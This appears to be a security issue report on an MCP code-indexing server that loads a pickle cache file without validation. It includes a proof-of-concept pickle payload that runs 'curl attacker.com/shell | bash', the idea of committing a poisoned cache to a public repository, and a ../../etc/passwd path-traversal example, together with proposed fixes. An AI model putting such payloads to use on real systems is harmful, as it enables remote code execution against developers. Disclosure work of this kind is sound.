Security: pickle.load() without integrity check enables arbitrary code execution #4

@Mibayy

Summary

The cache loader in server.py calls pickle.load() on .codebase-index-cache.pkl before any validation. pickle.load() can execute arbitrary code while it deserializes, so the isinstance() checks that follow run too late to offer any protection.

Vulnerable code

# server.py lines ~183-201
def _load_cache(project_root: str) -> "ProjectIndex | None":
    path = _cache_path(project_root)
    if not os.path.exists(path):
        return None
    try:
        with open(path, "rb") as f:
            payload = pickle.load(f)   # <-- code executes HERE
        if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
            return None
        index = payload["index"]
        if not isinstance(index, PI):
            return None
        return index
    # (except clause elided in this excerpt)

Attack vector

Any process with write access to the project directory can plant a malicious .codebase-index-cache.pkl:

import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

with open(".codebase-index-cache.pkl", "wb") as f:
    pickle.dump({"version": 1, "index": Exploit()}, f)

On the next MCP server start (or first tool call), _ensure_index() -> _load_cache() runs the payload with the privileges of the MCP server process.

A malicious actor could also commit the file to a public repo — any developer who clones it and starts the MCP server would be exploited silently.

Suggested fix

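Option A (recommended): replace pickle with JSON. Serialize only the structural metadata (dicts, lists, strings, ints). JSON parsing builds plain data and never invokes callables, so the code-execution path disappears; the version and type checks are still worth keeping on the loaded values.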
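A minimal sketch of what Option A could look like, assuming the index can be reduced to plain dicts, lists, strings and ints. The names save_cache and load_cache and the shape of the index data are hypothetical; only _CACHE_VERSION mirrors a name from the excerpt above, and its value here is an assumption.

```python
import json
import os

_CACHE_VERSION = 1  # assumption: mirrors the constant used in server.py


def save_cache(path: str, index_data: dict) -> None:
    """Write the index as JSON. index_data must contain only JSON-safe types."""
    payload = {"version": _CACHE_VERSION, "index": index_data}
    with open(path, "w", encoding="utf-8") as f:
        json.dump(payload, f)


def load_cache(path: str) -> "dict | None":
    """Return the cached index dict, or None if missing, corrupt, or stale."""
    if not os.path.exists(path):
        return None
    try:
        with open(path, "r", encoding="utf-8") as f:
            # json.load only builds dicts/lists/strings/numbers; it never
            # calls code named by the file contents.
            payload = json.load(f)
    except (OSError, ValueError):
        # ValueError covers json.JSONDecodeError and UnicodeDecodeError.
        return None
    if not isinstance(payload, dict) or payload.get("version") != _CACHE_VERSION:
        return None
    index = payload.get("index")
    return index if isinstance(index, dict) else None
```

With this shape, a planted file can at worst supply wrong data, which the caller would then have to convert back into a ProjectIndex and validate field by field.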

Option B — SafeUnpickler with allowlist:

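import pickle

# Only classes from these modules may be reconstructed; everything else is rejected.
# A stricter variant would allowlist (module, name) pairs instead of whole modules.
_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream references (e.g. os.system).
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)

# In _load_cache(), in place of pickle.load(f):
payload = SafeUnpickler(f).load()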
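To check that the allowlist actually stops the payload from the attack vector section, something like the following could be run. It is only a sketch: try_load is a hypothetical helper, the payload is swapped for a harmless echo, and the data is loaded from memory rather than from the real cache file.

```python
import io
import os
import pickle

# Same allowlist as in Option B.
_SAFE_MODULES = {"mcp_codebase_index.models", "mcp_codebase_index.project_indexer"}


class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in _SAFE_MODULES:
            raise pickle.UnpicklingError(f"Blocked: {module}.{name}")
        return super().find_class(module, name)


class Exploit:
    def __reduce__(self):
        # Harmless stand-in for the real payload.
        return (os.system, ("echo pwned",))


def try_load(data: bytes):
    """Hypothetical helper: load with the allowlist, report rejections as text."""
    try:
        return SafeUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return f"rejected: {exc}"


malicious = pickle.dumps({"version": 1, "index": Exploit()})
benign = pickle.dumps({"version": 1, "index": {"files": ["a.py"]}})

result_malicious = try_load(malicious)  # rejected before os.system is resolved
result_benign = try_load(benign)        # plain containers never hit find_class
print(result_malicious)
print(result_benign)
```

The rejection happens inside find_class, before the callable is ever looked up, so the command is never run. Built-in containers and scalars do not go through find_class, which is why the benign payload loads unchanged.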

Additional findings from the same audit

  • ReDoS in search_codebase (query_api.py): a user-supplied regex is applied to every line with no timeout. Mitigation: the third-party regex library with timeout=2.0, or signal.alarm (Unix only, main thread only).
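  • Path traversal in reindex_file (project_indexer.py ~L186): ../../etc/passwd is not validated against the project root. A check such as if rel_path.startswith(".."): raise ValueError is not sufficient on its own, since src/../../etc/passwd and absolute paths bypass it. Fix: resolve the joined path and raise ValueError unless it still lies inside the root.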
  • Ambiguous endswith matching in _resolve_file (query_api.py ~L233): a suffix match can return unintended files (for example, a lookup for utils.py would presumably also match test_utils.py).
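For the path traversal finding, a containment check along these lines may be more robust than a prefix test. This is a sketch under assumptions: resolve_inside_root is a hypothetical helper, and how reindex_file receives its root and relative path is not shown in this issue.

```python
import os


def resolve_inside_root(project_root: str, rel_path: str) -> str:
    """Return the absolute path for rel_path, or raise if it escapes project_root."""
    root = os.path.realpath(project_root)
    # realpath collapses ".." segments and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(root, rel_path))
    # commonpath compares whole path components, so a sibling directory such as
    # "<root>-evil" is not mistaken for something inside "<root>".
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"Path escapes project root: {rel_path!r}")
    return candidate
```

Because os.path.join discards the root when rel_path is absolute, inputs like /etc/passwd are rejected by the same comparison as ../../etc/passwd.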

Environment

Discovered during a local security audit before production deployment. Cache files added to .gitignore as interim mitigation. Happy to submit a PR.
